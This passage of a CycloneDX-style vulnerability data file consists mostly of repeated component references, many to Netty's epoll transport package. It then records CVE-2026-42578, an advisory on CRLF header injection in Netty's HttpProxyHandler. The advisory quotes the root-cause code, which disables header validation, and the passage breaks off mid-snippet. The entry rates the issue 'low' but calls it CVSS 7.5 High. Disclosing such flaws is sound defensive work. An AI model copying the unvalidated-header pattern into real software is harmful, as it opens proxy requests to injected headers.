          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#b69f03d8-9de7-4f7b-aaa6-ccd17f4b9579"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#b69f03d8-9de7-4f7b-aaa6-ccd17f4b9579"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#b69f03d8-9de7-4f7b-aaa6-ccd17f4b9579"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#b69f03d8-9de7-4f7b-aaa6-ccd17f4b9579"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#b69f03d8-9de7-4f7b-aaa6-ccd17f4b9579"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#b69f03d8-9de7-4f7b-aaa6-ccd17f4b9579"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#424a5e0e-7c00-40f9-974d-280d4a4dfde7"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#424a5e0e-7c00-40f9-974d-280d4a4dfde7"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#424a5e0e-7c00-40f9-974d-280d4a4dfde7"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#424a5e0e-7c00-40f9-974d-280d4a4dfde7"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#424a5e0e-7c00-40f9-974d-280d4a4dfde7"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#424a5e0e-7c00-40f9-974d-280d4a4dfde7"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#424a5e0e-7c00-40f9-974d-280d4a4dfde7"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#4a767ccc-bb97-46c1-b88b-a11122e785b9"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#4a767ccc-bb97-46c1-b88b-a11122e785b9"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#4a767ccc-bb97-46c1-b88b-a11122e785b9"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#4a767ccc-bb97-46c1-b88b-a11122e785b9"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#4a767ccc-bb97-46c1-b88b-a11122e785b9"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#4a767ccc-bb97-46c1-b88b-a11122e785b9"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#4a767ccc-bb97-46c1-b88b-a11122e785b9"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#511f6a04-5bb6-4859-a58f-37b19d721f57"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#511f6a04-5bb6-4859-a58f-37b19d721f57"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#511f6a04-5bb6-4859-a58f-37b19d721f57"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#511f6a04-5bb6-4859-a58f-37b19d721f57"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#511f6a04-5bb6-4859-a58f-37b19d721f57"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#511f6a04-5bb6-4859-a58f-37b19d721f57"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#511f6a04-5bb6-4859-a58f-37b19d721f57"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#267a4d8e-5df6-4c46-8662-ed5b51680104"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#267a4d8e-5df6-4c46-8662-ed5b51680104"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#267a4d8e-5df6-4c46-8662-ed5b51680104"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#267a4d8e-5df6-4c46-8662-ed5b51680104"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#267a4d8e-5df6-4c46-8662-ed5b51680104"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#267a4d8e-5df6-4c46-8662-ed5b51680104"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#267a4d8e-5df6-4c46-8662-ed5b51680104"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#10e451dc-2e17-4132-8934-27dee7ce398d"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#10e451dc-2e17-4132-8934-27dee7ce398d"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#10e451dc-2e17-4132-8934-27dee7ce398d"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#10e451dc-2e17-4132-8934-27dee7ce398d"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#10e451dc-2e17-4132-8934-27dee7ce398d"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#10e451dc-2e17-4132-8934-27dee7ce398d"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#10e451dc-2e17-4132-8934-27dee7ce398d"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#1dd23742-33a2-4e4d-a858-5e5ecb4b6fc6"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#1dd23742-33a2-4e4d-a858-5e5ecb4b6fc6"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#1dd23742-33a2-4e4d-a858-5e5ecb4b6fc6"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#1dd23742-33a2-4e4d-a858-5e5ecb4b6fc6"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#1dd23742-33a2-4e4d-a858-5e5ecb4b6fc6"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#1dd23742-33a2-4e4d-a858-5e5ecb4b6fc6"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#1dd23742-33a2-4e4d-a858-5e5ecb4b6fc6"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#22bb4903-eaf2-4150-9819-0b633018bfac"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#22bb4903-eaf2-4150-9819-0b633018bfac"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#22bb4903-eaf2-4150-9819-0b633018bfac"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#22bb4903-eaf2-4150-9819-0b633018bfac"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#22bb4903-eaf2-4150-9819-0b633018bfac"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#22bb4903-eaf2-4150-9819-0b633018bfac"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#22bb4903-eaf2-4150-9819-0b633018bfac"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#28275ff1-8b4e-45fd-b96c-2d0c46f8685a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#28275ff1-8b4e-45fd-b96c-2d0c46f8685a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#28275ff1-8b4e-45fd-b96c-2d0c46f8685a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#28275ff1-8b4e-45fd-b96c-2d0c46f8685a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#28275ff1-8b4e-45fd-b96c-2d0c46f8685a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#28275ff1-8b4e-45fd-b96c-2d0c46f8685a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#28275ff1-8b4e-45fd-b96c-2d0c46f8685a"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#007448f4-c18d-4eda-a954-ea64a1731937"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#007448f4-c18d-4eda-a954-ea64a1731937"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#007448f4-c18d-4eda-a954-ea64a1731937"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#007448f4-c18d-4eda-a954-ea64a1731937"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#007448f4-c18d-4eda-a954-ea64a1731937"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#007448f4-c18d-4eda-a954-ea64a1731937"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#007448f4-c18d-4eda-a954-ea64a1731937"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#4de6a4fe-188f-4632-9a12-88b546f7fca2"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#4de6a4fe-188f-4632-9a12-88b546f7fca2"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#4de6a4fe-188f-4632-9a12-88b546f7fca2"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#4de6a4fe-188f-4632-9a12-88b546f7fca2"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#4de6a4fe-188f-4632-9a12-88b546f7fca2"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#4de6a4fe-188f-4632-9a12-88b546f7fca2"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#4de6a4fe-188f-4632-9a12-88b546f7fca2"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#132e1f79-d720-4adf-a9a3-f2ec901b2348"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#132e1f79-d720-4adf-a9a3-f2ec901b2348"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#132e1f79-d720-4adf-a9a3-f2ec901b2348"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#132e1f79-d720-4adf-a9a3-f2ec901b2348"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#132e1f79-d720-4adf-a9a3-f2ec901b2348"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#132e1f79-d720-4adf-a9a3-f2ec901b2348"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#132e1f79-d720-4adf-a9a3-f2ec901b2348"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#349e64e7-6682-4867-adfd-7d287e66c5d2"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#349e64e7-6682-4867-adfd-7d287e66c5d2"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#349e64e7-6682-4867-adfd-7d287e66c5d2"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#349e64e7-6682-4867-adfd-7d287e66c5d2"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#349e64e7-6682-4867-adfd-7d287e66c5d2"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#349e64e7-6682-4867-adfd-7d287e66c5d2"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#349e64e7-6682-4867-adfd-7d287e66c5d2"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01149d6a-a5a8-4c86-86a6-ebde2de85883"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01149d6a-a5a8-4c86-86a6-ebde2de85883"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01149d6a-a5a8-4c86-86a6-ebde2de85883"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01149d6a-a5a8-4c86-86a6-ebde2de85883"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01149d6a-a5a8-4c86-86a6-ebde2de85883"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01149d6a-a5a8-4c86-86a6-ebde2de85883"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01149d6a-a5a8-4c86-86a6-ebde2de85883"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-42578",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "severity": "low"
        }
      ],
      "description": "# Security Vulnerability Report: HTTP Header Injection via HttpProxyHandler Disabled Validation in Netty\n\n## 1. Vulnerability Summary\n\n| Field | Value |\n|-------|-------|\n| **Product** | Netty |\n| **Version** | 4.2.12.Final (and all prior versions) |\n| **Component** | `io.netty.handler.proxy.HttpProxyHandler` |\n| **Vulnerability Type** | CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers |\n| **Impact** | HTTP Header Injection in CONNECT Proxy Requests |\n| **CVSS 3.1 Score** | **7.5 (High)** |\n| **CVSS 3.1 Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N` |\n| **Related Advisory** | **GHSA-84h7-rjj3-6jx4** (Incomplete Fix) |\n\n## 2. Affected Components\n\n- `io.netty.handler.proxy.HttpProxyHandler` \u2014 `newInitialMessage()` method (line 176) explicitly disables header validation via `withValidation(false)`\n\n## 3. Vulnerability Description\n\nNetty's `HttpProxyHandler` constructs HTTP CONNECT requests with **header validation explicitly disabled**. The `newInitialMessage()` method (line 176) creates headers using `DefaultHttpHeadersFactory.headersFactory().withValidation(false)`, then adds user-provided `outboundHeaders` (line 188-190) without any CRLF validation. 
This allows an attacker who can influence the outbound headers to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server.\n\n### Root Cause\n\n```java\n// HttpProxyHandler.java:176-190\nprotected Object newInitialMessage(ChannelHandlerContext ctx) throws Exception {\n    // ...\n    HttpHeadersFactory headersFactory = DefaultHttpHeadersFactory.headersFactory()\n        .withValidation(false);  // <-- VALIDATION EXPLICITLY DISABLED\n\n    FullHttpRequest req = new DefaultFullHttpRequest(\n        HttpVersion.HTTP_1_1, HttpMethod.CONNECT,\n        url, Unpooled.EMPTY_BUFFER, headersFactory, headersFactory);\n\n    req.headers().set(HttpHeaderNames.HOST, hostHeader);\n\n    if (authorization != null) {\n        req.headers().set(HttpHeaderNames.PROXY_AUTHORIZATION, authorization);\n    }\n\n    if (outboundHeaders != null) 